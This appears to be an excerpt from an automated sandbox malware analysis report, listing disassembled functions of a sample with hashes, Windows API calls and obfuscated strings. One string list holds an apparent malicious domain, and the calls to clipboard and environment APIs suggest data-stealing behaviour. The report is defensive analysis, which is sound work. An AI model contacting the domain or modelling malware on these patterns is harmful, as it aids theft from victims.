                                                                              • Instruction ID: ffcda9fbc27d5fd1cec50cde84d534a082da3ff5d4e5b8e77816747385cb8e1d
                                                                              • Opcode Fuzzy Hash: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
                                                                              • Instruction Fuzzy Hash: 82E1D1715083808BD724CF24C8947ABBBE2FFD5308F08892DE4D99B392DB798509CB56
                                                                              Function 0040E16E Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                              • API String ID: 3861434553-1392773931
                                                                              • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
                                                                              • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96
                                                                              Function 020EE3D5 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                              • API String ID: 3861434553-1392773931
                                                                              • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction ID: b67dcc53e1f5b9a9046d342083c3438ea7ed314a732bca0f0875777a6fefb21c
                                                                              • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction Fuzzy Hash: 92C1207150C3C08FDB358F24C8687ABBBE1AFD2314F08496CD4DA5B286D778450ACB96
                                                                              Function 0040B280 Relevance: 10.4, Strings: 8, Instructions: 384COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                              • API String ID: 0-3323421312
                                                                              • Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                              • Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
                                                                              • Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                              • Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B
                                                                              Function 020EB4E7 Relevance: 10.4, Strings: 8, Instructions: 384COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                              • API String ID: 0-3323421312
                                                                              • Opcode ID: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                              • Instruction ID: 265cdfc16e3511ba22bfdc361cc743bcdb55910c342fa917b97e302e0b98687b
                                                                              • Opcode Fuzzy Hash: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                              • Instruction Fuzzy Hash: DAD1117150C3808FDB25CF29889036BBBE2BFD160CF08892CE4E65B345D776854ADB86
                                                                              Function 00409360 Relevance: 10.3, Strings: 8, Instructions: 272COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                              • API String ID: 0-1466227541
                                                                              • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
                                                                              • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A
                                                                              Function 020E95C7 Relevance: 10.3, Strings: 8, Instructions: 272COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                              • API String ID: 0-1466227541
                                                                              • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction ID: 009b78caf145602bb3de88dbbd43aaa64ced3417470bbf3da46bf7fdccf51cee
                                                                              • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction Fuzzy Hash: 8071033058C3C68ED7118F76C4A076BFFE0AF92344F18496CE8E14B291D3798149EB56
                                                                              Function 0042A7F0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 573COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: *$*$q
                                                                              • API String ID: 237503144-4001757600
                                                                              • Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                              • Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
                                                                              • Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                              • Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86
                                                                              Function 02101D97 Relevance: 9.3, Strings: 7, Instructions: 527COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !@$,$0$6$p$q$v
                                                                              • API String ID: 0-585546663
                                                                              • Opcode ID: 2e7f69736473084efa3132fe79f0750aac7e3de4be733c7d81ca4ce4f9e6d1fa
                                                                              • Instruction ID: d2da6f60e0df82352be2d3e895d7fe62a647346e5e4daae969a45d2be3b1464b
                                                                              • Opcode Fuzzy Hash: 2e7f69736473084efa3132fe79f0750aac7e3de4be733c7d81ca4ce4f9e6d1fa
                                                                              • Instruction Fuzzy Hash: A2229F7164C7408FD3289F28C49876EBBE2BB85314F158A2DE9E9C73D1D7B98845CB42
                                                                              Function 00409660 Relevance: 9.2, Strings: 7, Instructions: 448COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                                                              • API String ID: 0-2829372548
                                                                              • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction ID: 6807048b151084a9e8e11973f3dfbc4b5eda1ab4f65a555cc9214e5bb2479a1e
                                                                              • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction Fuzzy Hash: 2DD1247120C7818BD729CF29C45036BBFE1AB97314F0889AED0D5DB382DA3D8909C756
                                                                              Function 020E98C7 Relevance: 9.2, Strings: 7, Instructions: 448COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                                                              • API String ID: 0-2829372548
                                                                              • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction ID: d7eb0b9bf061da89c4d4779840249716a71030cb1bf12fc3624199596e283d06
                                                                              • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction Fuzzy Hash: FBD1F67160C7918FD72ACF29C85136BBFE1AF97218F0889ADD0D6CB282D7398549C752
                                                                              Function 00437A60 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                              • String ID:
                                                                              • API String ID: 1006321803-0
                                                                              • Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                              • Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
                                                                              • Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                              • Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7
                                                                              Function 0043C6C0 Relevance: 9.1, Strings: 7, Instructions: 361COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >$A$O$f$g$j$q
                                                                              • API String ID: 0-654885204
                                                                              • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction ID: 933c444832a5593444b97503960d5bfec1f1b34db4cd747dab4759e8adc9f3c2
                                                                              • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction Fuzzy Hash: DAD1F633A0C7D04AD324853C889535BAEC25BE6324F1D8B7EE9F5973C6D66D88068357
                                                                              Function 0211C927 Relevance: 9.1, Strings: 7, Instructions: 361COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >$A$O$f$g$j$q
                                                                              • API String ID: 0-654885204
                                                                              • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction ID: 50bfd1a502e39c2c2a08f8df3c99edf390dcfc5986df542f6e9953db3c224308
                                                                              • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction Fuzzy Hash: 71D1F633A4CBD04AD328853C885539BAED25BD2224F1D8B7EE9F5C73C6D67988058393
                                                                              Function 020F7DFA Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 243COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020F80D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 7$TW$WH$}&'$
                                                                              • API String ID: 237503144-3022637246
                                                                              • Opcode ID: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                              • Instruction ID: d9cca356b2004e85a1960bbc8b9e83d62199e10724d69eab686782ffbc5a0469
                                                                              • Opcode Fuzzy Hash: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                              • Instruction Fuzzy Hash: 7691F275A483528BC354CF28C89036BBBE2FFD8354F288A1CE5C54BB65E3788945DB52
                                                                              Function 00428B10 Relevance: 8.0, Strings: 6, Instructions: 513COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Gt$J[$LUC_$we`k$x}{z$|A
                                                                              • API String ID: 0-4062276182
                                                                              • Opcode ID: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                                                              • Instruction ID: f20c1733954f3d7476a331e7578cdc678171662c1333d6829e8b94656b24469a
                                                                              • Opcode Fuzzy Hash: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                                                              • Instruction Fuzzy Hash: 080200B5A08350CBD3209F25D84176BBBE2FFC6318F454A6DE5C85B390DB799805CB8A
                                                                              Function 020E8CC7 Relevance: 7.7, APIs: 5, Instructions: 216threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 020E8CEB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 020E8CF5
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020E8DDD
                                                                              • GetForegroundWindow.USER32 ref: 020E8DF2
                                                                              • ExitProcess.KERNEL32 ref: 020E8F6E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 4063528623-0
                                                                              • Opcode ID: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                              • Instruction ID: 5334e55eef7e5121d4a65acc5c215616f70d8f6a9c713780899dc1dabcc19eda
                                                                              • Opcode Fuzzy Hash: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                              • Instruction Fuzzy Hash: D4618873B143144FD718AE799C0639AB6C39BC5710F0FC63DD986EB7A0EA7888069385
                                                                              Function 004042C0 Relevance: 6.7, Strings: 5, Instructions: 465COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$)$IDAT$IEND$IHDR
                                                                              • API String ID: 0-3469842109
                                                                              • Opcode ID: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
                                                                              • Instruction ID: 828f2798e7534a509cb653a25c5a447f63e0741c52f375536a6b9b324fae408e
                                                                              • Opcode Fuzzy Hash: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
                                                                              • Instruction Fuzzy Hash: 5E02E3B46043808FD700DF29D89075ABBE1EBD6304F05897EEA859B3D1D379D909CB96
                                                                              Function 020E4527 Relevance: 6.7, Strings: 5, Instructions: 465COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$)$IDAT$IEND$IHDR
                                                                              • API String ID: 0-3469842109
                                                                              • Opcode ID: 6dda164276c19b2348408bf08e15d5684114f8bdc5157cb020ecd11399e8153b
                                                                              • Instruction ID: 9f8138ba0c061efcb83b6a54f3847c26f37c2beb9293873ba60765052eeaa2f1
                                                                              • Opcode Fuzzy Hash: 6dda164276c19b2348408bf08e15d5684114f8bdc5157cb020ecd11399e8153b
                                                                              • Instruction Fuzzy Hash: 270225B06083808FDB10CF29D89076BBBE1FF96304F05856DE9868B391D376D949DB96
                                                                              Function 020EC2E7 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 50$DM_e$FwPq$Js$'!
                                                                              • API String ID: 0-1711485358
                                                                              • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction ID: 3123bf915e43bb5cc4629facff2eb9b84256f607e2857da94b3e62b158993021
                                                                              • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction Fuzzy Hash: 4B51DAB45493808FE338CF25C991B8BBBB1BBA1304F609A0CE6D95B254CB759446CF97
                                                                              Function 00419B30 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 947COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?), ref: 00419FF7
                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A039
                                                                                • Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                              • String ID: mj
                                                                              • API String ID: 764372645-1022201683
                                                                              • Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                              • Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
                                                                              • Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                              • Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B
                                                                              Function 00425713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 67
                                                                              • API String ID: 237503144-1886922373
                                                                              • Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                              • Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
                                                                              • Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                              • Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B
                                                                              Function 00425DA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 23
                                                                              • API String ID: 237503144-326707096
                                                                              • Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                              • Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
                                                                              • Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                              • Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89
                                                                              Function 00429917 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 67
                                                                              • API String ID: 237503144-1886922373
                                                                              • Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                              • Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
                                                                              • Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                              • Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A
                                                                              Function 00429B7B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 67
                                                                              • API String ID: 237503144-1886922373
                                                                              • Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                              • Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
                                                                              • Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                              • Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A
                                                                              Function 00437C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
